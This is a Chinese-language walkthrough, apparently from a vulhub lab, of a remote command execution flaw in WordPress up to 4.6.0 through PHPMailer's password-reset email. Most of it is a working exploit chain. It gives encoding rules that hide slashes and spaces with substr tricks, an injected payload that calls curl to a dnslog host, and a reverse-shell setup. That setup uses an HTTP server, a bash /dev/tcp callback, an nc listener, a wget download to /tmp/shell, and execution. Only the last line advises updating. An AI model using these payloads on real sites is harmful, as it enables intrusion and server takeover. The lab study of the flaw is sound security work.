当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行
WordPress <= 4.6.0
PHPMailer < 5.2.18
vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面
1、抓包,构造POST /wp-login.php?action=lostpassword,发包 ,存在漏洞
ps:
payload转换规则:
a.payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
b.payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替
edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}u74tkp.dnslog.cn}} null)
2、漏洞进一步利用,起一个tcp服务,新建一个txt文件存储反弹命令,然后开启nc监听1234端口
1、python3 -m http.server 80 (此处起的端口必须是80,否则反弹会不成功)
2、bash -i >& /dev/tcp/监听主机IP/1234 0>&1(ip.txt,以前的txt文件复制的,名字无所谓就不改了)
3、nc -lv 1234
3、构造payload,进行shell反弹
(1)利用wget --output-document /tmp/shell url 下载ip.txt 文件,保存在/tmp下面的shell文件里
(前面的http://会自动补齐,开启的是80端口,服务默认是80不显示,所以这里URL==服务IP)
1、edi(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/shell IP地址/ip.txt}} null )
2、编码后:
edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}IP地址${substr{0}{1}{$spool_directory}}ip.txt}}
dockerexec -it containerID bash 进入容器,查看另存shell成功
(2)写入反弹命令后,构造发包,获取shell
1、edi(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null )
2、编码后:edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
更新到最新版本
